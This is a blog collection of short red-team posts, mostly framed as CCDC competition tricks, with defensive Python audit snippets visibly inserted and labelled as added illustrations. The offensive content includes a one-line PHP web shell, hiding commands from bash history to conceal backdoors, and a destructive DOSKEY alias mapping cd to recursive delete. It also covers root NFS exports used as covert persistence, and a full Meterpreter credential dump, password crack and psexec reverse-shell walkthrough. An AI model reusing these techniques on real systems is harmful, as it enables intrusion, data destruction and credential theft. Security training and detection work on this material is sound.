Room362.com

Blatherings of a security addict.

PHP Web Shell


This is mostly for my memory for CCDC

<?php system($_GET['cmd']); ?>

I wonder what will happen if an RSS reader doesn’t do proper filtering…

Issue a Linux Command Without It Going Into History


CORRECTION:

Thanks to jduck for pointing it out: you need to actually make a configuration change to get this to work. Reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ (search for "Modifying History Behavior").

You simply put a space before the command:

mubix@localhost:/tmp/demo$ ls -alh
total 8.0K
drwxr-xr-x 2 mubix mubix 4.0K Mar  1 19:43 .
drwxrwxrwt 3 root  root  4.0K Mar  1 19:43 ..
-rw-r--r-- 1 mubix mubix    0 Mar  1 19:43 bob
mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$  mysecretlogin -u bobsuruncle -p allacazaam

mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$

Works well for backdoors you don’t want caught via the .bash_history as well ;-)
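The correction above comes down to bash's HISTCONTROL variable: the leading-space trick only works when it contains ignorespace (or ignoreboth, which Ubuntu's stock ~/.bashrc sets). The following is an added illustration, not code from the post, that models that filtering over a constructed replay of the transcript so a defender can see exactly which setting makes a command vanish from .bash_history.

```python
"""Model of how bash applies HISTCONTROL when deciding whether a
command line typed at the prompt is saved to the history list.
Added illustration, not code from the post; TYPED is a constructed
replay of the transcript above."""


def _flags(histcontrol: str) -> set:
    # Colon-separated list; "ignoreboth" is shorthand for
    # "ignorespace:ignoredups".
    flags = set()
    for item in (histcontrol or "").split(":"):
        if item == "ignoreboth":
            flags.update({"ignorespace", "ignoredups"})
        elif item:
            flags.add(item)
    return flags


def filter_history(commands, histcontrol=""):
    """Return the entries bash would keep for `commands`, typed in
    order, under the given HISTCONTROL value."""
    flags = _flags(histcontrol)
    history = []
    for line in commands:
        if "ignorespace" in flags and line.startswith(" "):
            continue  # never enters the history list at all
        if "ignoredups" in flags and history and history[-1] == line:
            continue  # identical to the previous entry
        if "erasedups" in flags:
            history = [h for h in history if h != line]
        history.append(line)
    return history


# Constructed replay of the demo: the login command carries the
# leading space, exactly as typed in the transcript.
TYPED = [
    "ls -alh",
    "cat ~/.bash_history",
    " mysecretlogin -u bobsuruncle -p allacazaam",
    "cat ~/.bash_history",
]

if __name__ == "__main__":
    for setting in ("", "ignorespace", "ignoreboth"):
        print(f"HISTCONTROL={setting!r}: {filter_history(TYPED, setting)}")
```

This only affects what bash writes to its own history file; process-level auditing such as auditd's execve records is unaffected by HISTCONTROL.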

More CCDC tricks as I think of them..

Destructive DOSKEY Aliases


Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY:

C:\Users\vmadmin>doskey /?
Edits command lines, recalls Windows commands, and creates macros.

DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]]
  [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename]
  [macroname=[text]]

  /REINSTALL          Installs a new copy of Doskey.
  /LISTSIZE=size      Sets size of command history buffer.
  /MACROS             Displays all Doskey macros.
  /MACROS:ALL         Displays all Doskey macros for all executables which have
                      Doskey macros.
  /MACROS:exename     Displays all Doskey macros for the given executable.
  /HISTORY            Displays all commands stored in memory.
  /INSERT             Specifies that new text you type is inserted in old text.
  /OVERSTRIKE         Specifies that new text overwrites old text.
  /EXENAME=exename    Specifies the executable.
  /MACROFILE=filename Specifies a file of macros to install.
  macroname           Specifies a name for a macro you create.
  text                Specifies commands you want to record.

UP and DOWN ARROWS recall commands; ESC clears command line; F7 displays
command history; ALT+F7 clears command history; F8 searches command
history; F9 selects a command by number; ALT+F10 clears macro definitions.

The following are some special codes in Doskey macro definitions:
$T     Command separator.  Allows multiple commands in a macro.
$1-$9  Batch parameters.  Equivalent to %1-%9 in batch programs.
$*     Symbol replaced by everything following macro name on command line.

Just like the Linux ‘alias’ command in some ways, you can remap pretty much any command you want. Here are some of the more evil ones I have used in the past:

  • doskey cd=del /f /s $1
  • doskey tasklist=cat tasklist.txt
  • doskey dir=dir ……

I’m sure you can think of a ton more..

The great thing is that there isn’t a /delete switch; you just have to know that to remove a doskey macro you issue the definition with nothing after the equals sign, so ‘doskey tasklist=’ deletes the tasklist macro.
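Macros live in the console session, so a defender sees them with the `doskey /macros` switch documented in the help text above. The auditor below, an added illustration rather than code from the post, reads that `name=text` output (the same format `/macrofile=` consumes) and flags macros that replace a command with a different one or chain several commands behind one name; the sample macro file is constructed from the ones listed in the post.

```python
"""Audit DOSKEY macro definitions for macros that quietly replace a
command. Added illustration, not code from the post. Input is the
`name=text` format that `doskey /macros` prints and `/macrofile=`
reads; SAMPLE_MACROS is constructed."""
import re

# Commands an operator expects to behave as documented; a macro with
# one of these names replaces it for the rest of the cmd session.
SHADOW_TARGETS = {"cd", "dir", "del", "copy", "move", "type", "tasklist",
                  "netstat", "net", "sc", "reg", "doskey", "exit"}


def expand_body(body: str) -> str:
    """Render the special codes from `doskey /?` into readable form."""
    out = re.sub(r"\$[tT]", " & ", body)          # $T: command separator
    out = out.replace("$*", "<all args>")          # $*: rest of the line
    return re.sub(r"\$([1-9])", r"<arg\1>", out)   # $1-$9: batch parameters


def parse_macros(text: str) -> dict:
    """Return {name: body}; an empty body is how a macro gets removed."""
    macros = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and "=" in line:
            name, body = line.split("=", 1)
            macros[name.strip().lower()] = body.strip()
    return macros


def audit_macros(text: str) -> list:
    """(name, expanded body, reason) for every macro worth a look."""
    findings = []
    for name, body in parse_macros(text).items():
        if not body:
            continue
        first = body.split()[0].lower()
        if name in SHADOW_TARGETS and first != name:
            findings.append((name, expand_body(body),
                             f"'{name}' now runs '{first}'"))
        elif re.search(r"\$[tT]", body):
            findings.append((name, expand_body(body),
                             "macro chains several commands"))
    return findings


# Constructed macro listing: two from the post, two harmless ones.
SAMPLE_MACROS = """\
cd=del /f /s $1
tasklist=cat tasklist.txt
ll=dir /a $*
dir=dir $*
"""
```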

Creating Vulnerabilities: NFS Exports


Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap, and given the right directory and permissions it can lead you right back to getting a shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049).

Here is a quick how-to on setting up NFS

https://help.ubuntu.com/community/SettingUpNFSHowTo

I’m sure you can think of many more evil locations, but /etc/, /var/www/, and /root/ are some of my favorite exports, and there is no reason I know of why you couldn’t just export ‘/’. (NFSd might not permit it.)

Remember to change the NFS settings so that it runs as root and you are golden.
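From the defender's side, the three things this post relies on are all visible in /etc/exports: a sensitive directory, a client spec open to any host, and the no_root_squash option (the setting that lets a remote root keep uid 0, which is what "runs as root" buys). The auditor below is an added illustration, not code from the post or the Ubuntu how-to; the exports file it parses is constructed.

```python
"""Audit an /etc/exports file for the exposures the post describes:
sensitive directories exported, any-host client specs and
no_root_squash. Added illustration, not code from the post;
SAMPLE_EXPORTS is constructed."""
import re
from pathlib import PurePosixPath

# Directories the post names as favourite exports.
SENSITIVE = [PurePosixPath(p) for p in ("/etc", "/root", "/var/www")]


def parse_exports(text: str):
    """Yield (path, host, options) per client on every export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:          # no client at all: everyone
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", client)
            if not m:
                continue
            host = m.group(1) or "*"              # "(rw)" alone: everyone
            opts = {o for o in (m.group(2) or "").split(",") if o}
            yield path, host, opts


def audit_exports(text: str) -> list:
    """Return (path, host, reasons) for every export worth a look."""
    findings = []
    for path, host, opts in parse_exports(text):
        p, reasons = PurePosixPath(path), []
        if p == PurePosixPath("/"):
            reasons.append("exports the whole filesystem")
        else:
            for s in SENSITIVE:
                if p == s or p in s.parents or s in p.parents:
                    reasons.append(f"touches sensitive path {s}")
                    break
        if host == "*":
            reasons.append("exported to any client")
        if "no_root_squash" in opts:
            mode = "rw" if "rw" in opts else "ro"
            reasons.append(f"no_root_squash ({mode}): remote root keeps uid 0")
        if reasons:
            findings.append((path, host, reasons))
    return findings


# Constructed exports file: two ordinary shares, two of the kind the
# post describes.
SAMPLE_EXPORTS = """\
/srv/share   10.10.10.0/24(ro,sync)
/home/alice  10.10.10.5(rw,sync)
/var/www     *(rw,sync,no_root_squash)
/etc         10.10.10.0/24(rw,no_root_squash)
"""
```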

Interesting DNS Stuff - SRV Records


The following are good adds to your DNS brute force list:

These are all SRV records, so make sure your query type is set correctly. The great thing about SRV records is that the answer tells you the port. Isn’t that nice of them?

I don’t know of any DNS tools that utilize SRV as part of their process, but scripting dig to do so isn’t tough.

_autodiscover._tcp
_caldav._tcp
_client._smtp
_gc._tcp
_h323cs._tcp
_h323cs._udp
_h323ls._tcp
_h323ls._udp
_h323rs._tcp
_http._tcp
_iax._udp
_imap._tcp
_imaps._tcp
_jabber-client._tcp
_jabber._tcp
_kerberos-adm._tcp
_kerberos._tcp
_kerberos._tcp.dc._msdcs
_kerberos._udp
_kpasswd._tcp
_kpasswd._udp
_ldap._tcp
_ldap._tcp.dc._msdcs
_ldap._tcp.gc._msdcs
_ldap._tcp.pdc._msdcs
_msdcs
_mysqlsrv._tcp
_ntp._udp
_pop3._tcp
_pop3s._tcp
_sip._tcp
_sip._tls
_sip._udp
_sipfederationtls._tcp
_sipinternaltls._tcp
_sips._tcp
_smtp._tcp
_stun._tcp
_stun._udp
_tcp
_tls
_udp
_vlmcs._tcp
_vlmcs._udp
_wpad._tcp
_xmpp-client._tcp
_xmpp-server._tcp
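Scripting dig for this list is mostly building the names and reading the four fields of each answer, which is also how you inventory what your own zone advertises. The following is an added illustration, not code from the post: it assembles the query names from the prefixes above, parses `dig +short SRV` output (priority, weight, port, target) and summarises the ports; the domain and the dig output are constructed, and only `run_dig` touches the network.

```python
"""Build SRV query names from the prefix list and parse what
`dig +short SRV <name>` returns. Added illustration, not code from the
post; SAMPLE_OUTPUT and the example.com names are constructed."""
import subprocess
from collections import namedtuple

SRV = namedtuple("SRV", "name priority weight port target")

# A subset of the prefixes listed in the post.
PREFIXES = ["_ldap._tcp", "_kerberos._tcp", "_sip._tls", "_autodiscover._tcp"]


def srv_names(domain: str, prefixes=PREFIXES):
    """Fully qualified SRV names to query for `domain`."""
    return [f"{p}.{domain.rstrip('.')}" for p in prefixes]


def parse_dig_short(name: str, output: str):
    """Parse `dig +short SRV` lines: '<prio> <weight> <port> <target>'."""
    records = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) != 4 or not all(x.isdigit() for x in parts[:3]):
            continue  # empty answer, or a CNAME in the chain
        prio, weight, port = map(int, parts[:3])
        records.append(SRV(name, prio, weight, port, parts[3].rstrip(".")))
    # Clients try the lowest priority first, then weight-proportional.
    return sorted(records, key=lambda r: (r.priority, -r.weight))


def run_dig(name: str, server: str = None) -> str:
    """Real lookup via the dig binary (not exercised offline)."""
    cmd = ["dig", "+short", "SRV", name]
    if server:
        cmd.append(f"@{server}")
    return subprocess.run(cmd, capture_output=True, text=True).stdout


def exposed_ports(records):
    """{port: sorted targets} across all answers, for an inventory."""
    ports = {}
    for r in records:
        ports.setdefault(r.port, set()).add(r.target)
    return {p: sorted(t) for p, t in sorted(ports.items())}


# Constructed `dig +short SRV _ldap._tcp.example.com` output.
SAMPLE_OUTPUT = "10 50 389 dc2.example.com.\n0 100 389 dc1.example.com.\n"
```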

Cachedump for Meterpreter in Action


Update: Cachedump has been added to the Metasploit trunk:

https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946

Pull it down:

wget http://lab.mediaservice.net/code/cachedump.rb

put it here: /(metasploitdir)/modules/post/windows/gather

Load up console and pwn something then (MAKE SURE YOU ARE SYSTEM):

meterpreter > run post/windows/gather/cachedump
[*] Executing module against WORKSTATION244
[*] Obtaining the boot key...
[*] Trying 'XP' style...
[*] Getting PolSecretEncryptionKey...
[*] XP compatible client
[*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c
[*] Getting LK$KM...
[*] Dumping cached credentials...
Username  : jdoe
Hash  : 592cdfbc3f1ef77ae95c75f851e37166
Last login  : 2010-05-11 01:43:48
DNS Domain Name  : CONTOSO.CO
Effective Name  : jdo
Full Name  : eJane Do
User ID  : 1107
Primary Group ID  : 513
Additional groups  : 33620069 33554432 34013184
Logon domain name  : CONTOS
----------------------------------------------------------------------
 
[*] John the Ripper format:
jdoe:592cdfbc3f1ef77ae95c75f851e37166:CONTOSO.CO:CONTOS

[*] Hash are in MSCACHE format. (mscash)
meterpreter >

Crack it:

cat lab.dic | ./john --stdin lab.mscash --format=mscash --pot=lab.pot  
Loaded 1 password hash (M$ Cache Hash [Generic 1x])  
ASDqwe123  (jdoe)  
guesses: 1  time: 0:00:00:00  c/s: 500  trying: ASDqwe123

Use it:

meterpreter > background  
msf exploit(handler) > route add 10.10.10.0 255.255.255.0 1  
msf exploit(handler) > use exploit/windows/smb/psexec  
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp  
PAYLOAD => windows/meterpreter/reverse_tcp  
msf exploit(psexec) > set LHOST X.X.X.X  
LHOST => X.X.X.X  
msf exploit(psexec) > set LPORT 80  
LPORT => 80  
msf exploit(psexec) > set SMBDomain Contoso
SMBDomain => Contoso  
msf exploit(psexec) > set SMBUser jdoe  
SMBUser => jdoe  
msf exploit(psexec) > set SMBPass ASDqwe123  
SMBPass => ASDqwe123  
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name  Current Setting  Required  Description  
----  ---------------  --------  -----------  
RHOST  yes  The target address  
RPORT  445  yes  Set the SMB service port  
SMBDomain  Contoso  no  The Windows domain to use for authentication  
SMBPass  ASDqwe123  no  The password for the specified username  
SMBUser  jdoe  no  The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):


Name  Current Setting  Required  Description  
----  ---------------  --------  -----------  
EXITFUNC  process  yes  Exit technique: seh, thread, none, process  
LHOST  X.X.X.X  yes  The listen address  
LPORT  80  yes  The listen port


Exploit target:

Id  Name  
--  ----  
0  Automatic

 
msf exploit(psexec) > set RHOST 10.10.10.200  
RHOST => 10.10.10.200  
msf exploit(psexec) > exploit

[*] Started reverse handler on X.X.X.X:80  
[*] Connecting to the server...  
[*] Authenticating to 10.10.10.200:445|Contoso as user 'jdoe'...  
[*] Uploading payload...  
[*] Created jSlxARUj.exe...  
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[svcctl] ...  
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[svcctl] ...  
[*] Obtaining a service manager handle...  
[*] Creating a new service (SyHtwKpn - "MbEXNupOpYUL")...  
[*] Closing service handle...  
[*] Opening service...  
[*] Starting the service...  
[*] Removing the service...  
[*] Closing service handle...  
[*] Deleting jSlxARUj.exe...  
[*] Meterpreter session 2 opened (X.X.X.X:80 -> X.X.X.X:54430) at Mon Feb 14 22:23:00 +0000 2011

Woot ;-)
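The session output above is also a detection lesson: the service (SyHtwKpn, display name MbEXNupOpYUL) and the uploaded jSlxARUj.exe are random mixed-case letters, and the service is removed seconds after it starts, so the System event log's service-install record is the trace that survives. The heuristic below is an added illustration, not code from the post or from Metasploit; the event records are constructed in the shape of event 7045 fields, and the lengths (8, 12, 8) are taken from this one run and should be tuned against your own baseline.

```python
"""Heuristic for the service-install footprint visible in the psexec
run above. Added illustration, not code from the post; SAMPLE_EVENTS
is constructed in the shape of System log event 7045 (a service was
installed) fields."""
import re

RAND8 = re.compile(r"^[A-Za-z]{8}$")
RAND12 = re.compile(r"^[A-Za-z]{12}$")
RAND_EXE = re.compile(r"^([A-Za-z]{8})\.exe$", re.IGNORECASE)


def looks_random(token: str) -> bool:
    """Letters only, with the case flipping at least three times
    ('SyHtwKpn'), which real names such as 'Spooler' rarely do."""
    flips = sum(a.isupper() != b.isupper() for a, b in zip(token, token[1:]))
    return token.isalpha() and flips >= 3


def psexec_score(event: dict) -> int:
    """Number of the three name indicators present in a 7045 event."""
    if event.get("EventID") != 7045:
        return 0
    name = event.get("ServiceName", "")
    display = event.get("DisplayName", "")
    exe = event.get("ImagePath", "").replace("\\", "/").rsplit("/", 1)[-1]
    m = RAND_EXE.match(exe)
    return sum([
        bool(RAND8.match(name)) and looks_random(name),
        bool(RAND12.match(display)) and looks_random(display),
        bool(m) and looks_random(m.group(1)),
    ])


def flag_events(events, threshold=2):
    """(RecordId, score) for events at or above the threshold."""
    return [(e["RecordId"], psexec_score(e))
            for e in events if psexec_score(e) >= threshold]


# Constructed events: the first mirrors the names in the session output
# above (the ImagePath is assumed), the second is an ordinary install.
SAMPLE_EVENTS = [
    {"RecordId": 101, "EventID": 7045, "ServiceName": "SyHtwKpn",
     "DisplayName": "MbEXNupOpYUL",
     "ImagePath": r"%SystemRoot%\jSlxARUj.exe"},
    {"RecordId": 102, "EventID": 7045, "ServiceName": "BackupAgent",
     "DisplayName": "Backup Agent Service",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
]
```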

Patch Adams


Thought I would share this video; if it isn’t a swift kick in the pants to do better with your life, I don’t know what is:

Insider Threat Testing


In this day and age everyone is worried about the insider threat. Internal penetration testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your servers. External penetration tests are never scoped for that sort of testing. So what is a company to do? How can they know what the risk is? The answer? Usually they guess or assume, mostly because they are scared to find out, it’s happened to them before, or one of a million different justifications. I’ve got a webinar coming up to describe exactly this type of testing, but I thought I’d go into it a bit here.

The FBI has files upon files and stories stacked miles high about spies and insiders taking everything from accounting information (I could have put LIVES for effect but that’s more of a one-off) to staplers (no, I don’t think Milton has an FBI file). Insiders throughout time have been the biggest threat to organizations even before sabotage and espionage became words. OK, so what’s the big build-up for? Simple. We need to build organizations up in the detection department from a pentester’s point of view, not a signature-based one. Our pentesters need to talk to our forensics guys, the incident responders need to talk to the pentesters, and every which way between. We are losing this battle, and one of the reasons we are is that we keep our bag of tricks to ourselves, and that’s what insider threat testing is all about: getting all the tricks tested in a more open fashion.

Can your organization see a command and control session via IRC? What if it’s pushed over port 80? What about a standard meterpreter reverse_tcp connection? There isn’t a money-based solution for this, just like there isn’t for phishing. Added on to all of the other things your security team does, there needs to be an employee, or a consultant, that is on the phone with your team saying “did you see this?”. Sort of like the ‘Can you hear me now?’ test. I mean, have you ever met an incident response team that took time out of their day to see if they could get Poison Ivy (one of the most well known RATs, remote access tools) through the firewall undetected? Probably, but when they came and told you about it you chastised them for it.

In any case, I’ve jumped around roles in this post a lot and I want to focus it back on getting true collaborative testing done, but there has to be a balance. If you’re staring at a piece of earth, you’ll see the ant walk on by, but you’ll probably miss a half dozen of them on your way to check the mail. So how do you do this? Why not make it an educational process? Have the senior staff on the phone with the tester, and then tell the junior guys something like “We just had a breach and it’s starting to exfil data to this IP: x.x.x.x”. Give them a chance to find it, then work through with them where / what happened, why or why not any alerts or alarms went off, and whether they saw it in their normal flow. Ideally they spot it before the senior staff even mention it.

No, this will not fit into the ‘I give you report you give me money’ scenario. Companies should consider it a training exercise where they get instant and obvious benefit.

There are many other arenas this helps in too. For example phishing: you know how much harder it will be for an attacker to get a payload to work if you’ve already tested, detected and have traps (we’ll go into setting traps another time) for all the public avenues of C&C and exfiltration? They will get frustrated, and you’ll know that you’re being attacked. A proactive stance is what ‘testing’ is all about, and this is an extremely neglected aspect of it.

No one will solve ‘security’, all we are here to do is minimize the attack surface.

Come to the webinar to heckle, learn, or just hear more, or don’t. I just wanted to get this out there and ask the question: Can your most important data leave on a fake Lady Gaga CD without you knowing?

Update: Let me squash something real quick. No, this is not a new idea. The prevention side is talked about ad nauseam, but hardly anyone talks about testing to see what could really happen.